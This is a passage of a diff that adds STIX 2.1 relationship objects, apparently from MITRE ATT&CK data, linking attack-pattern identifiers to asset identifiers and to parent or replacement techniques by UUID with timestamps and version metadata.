"attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3d4f469-9847-41ef-a478-5eaf6003d483", + "created": "2023-10-02T20:23:00.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:23:00.405Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3ed20aa-3423-4898-98c8-6b60d96e158d", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d43819a1-bda1-499d-809c-98bbe2f929cb", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d455330d-f190-4854-8087-4c2c37003b45", + "created": "2023-09-29T17:39:29.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:39:29.897Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d466f2a4-4d31-4343-b56f-f2d132dc1d3e", + "created": "2020-03-20T19:51:55.369Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--54456690-84de-4538-9101-643e26437e09", + "target_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d48894cb-457e-4a81-82b4-2d735aea5128", + "created": "2023-09-28T19:50:56.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:50:56.496Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d4895c50-334c-4d8b-b329-8613de602fa4", + "created": "2020-03-20T14:28:39.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b2001907-166b-4d71-bb3c-9d26c871de09", + "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d49454bd-2939-4992-808d-341c141098ff", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d49abcb0-b617-42c3-a514-840746050aad", + "created": "2024-06-27T08:53:09.119Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:53:09.119Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d49eb47f-b421-4d6e-9664-d2b6b58dff14", + "created": "2024-05-22T17:08:23.175Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:22:33.516Z", + "description": "Asset Mapping Rationale: ", + "relationship_type": "targets", + "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d4aeae57-1028-4898-9020-af6df9dea9fc", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d4b04236-d45a-4570-9191-c1876549b546", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d4c228f6-b2b4-4f35-9122-b7c69399c73b", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d4dc30bf-283b-4c64-927a-b7c807948f19", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d52a74c8-4861-4efa-9a5b-a86acd0e53b0", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d52d45d0-81c8-4261-8150-bd55ce3b8d90", + "created": "2024-06-27T09:12:45.373Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:12:45.373Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5383423-6cad-49a0-bfca-a4c3c162ee7d", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d560e75d-20ce-45e2-8a37-daf6339f1a0f", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d57ae0c6-6bf7-452c-bd83-10144e4e1433", + "created": "2024-06-26T13:54:15.111Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:54:15.111Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d58d8b19-90bc-4a7f-840d-076be296ff20", + "created": "2023-09-29T17:09:01.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:09:01.803Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d59199cc-1fa8-4fa8-82df-61fe9c0b1f60", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5afd2ff-ca7f-4a53-b2ca-1628fda6f74d", + "created": "2020-02-21T15:42:26.323Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5b31b3d-3862-476e-ba9c-57ec718c3c7e", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5b532fe-3df9-4f92-a0f0-9c92823cdb6a", + "created": "2023-09-28T19:43:49.584Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:43:49.584Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5babb4f-b3ce-48bc-9806-d3d2a00d08c8", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5c24fec-a81a-4dfb-8d41-2199b76038a5", + "created": "2021-03-23T13:01:04.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5d49201-fb65-41c0-a56b-ad2ddea12a6d", + "created": "2024-06-26T15:19:02.420Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:19:02.420Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5dbb379-076c-4935-bfbd-d1439396da5a", + "created": "2024-06-26T14:29:41.855Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:29:41.855Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5e908f9-eea1-4e55-a406-f24c5dc74b2d", + "created": "2023-09-29T17:38:17.313Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:38:17.313Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5f54610-2127-4946-8c19-c377bce9a230", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d5ffcd6e-be9e-4efe-9822-974f3838c7db", + "created": "2019-11-27T14:58:00.700Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d606ceff-52e5-43a2-a5e7-e86115a4a12c", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d607d79e-a3f0-4236-946c-e434068d008b", + "created": "2020-02-11T19:14:48.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d611b750-95e5-4f73-8f16-38db0a34a2e0", + "created": "2023-09-29T17:08:23.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:08:23.682Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d6486e7d-44a9-4ea6-8f63-6b049aefa723", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d648b3c7-77d2-42f3-a367-620621b714ab", + "created": "2023-09-28T21:11:29.314Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:11:29.314Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d664d777-c805-4c24-b020-cff0147f9c5b", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d685685c-1434-4a72-af92-ed87d5f074a0", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + 